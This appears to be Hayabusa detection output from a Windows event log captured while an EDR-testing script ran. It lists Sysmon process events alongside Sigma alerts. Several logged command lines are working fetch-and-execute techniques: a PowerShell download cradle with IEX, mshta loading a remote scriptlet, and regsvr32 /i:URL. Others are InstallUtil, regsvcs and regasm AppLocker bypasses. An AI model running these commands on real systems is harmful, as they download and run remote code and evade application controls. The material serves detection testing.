+2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 747F3D96-6619-5D3F-0000-0010FDE78600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 747F3D96-661E-5D3F-0000-0010A3148700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 747F3D96-661E-5D3F-0000-00103F168700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,rules/sigma/process_creation/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 747F3D96-6623-5D3F-0000-001011F68700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:24.104 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 747F3D96-6633-5D3F-0000-001051608900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 747F3D96-6633-5D3F-0000-0010D9778900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 747F3D96-6638-5D3F-0000-00103DA88900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
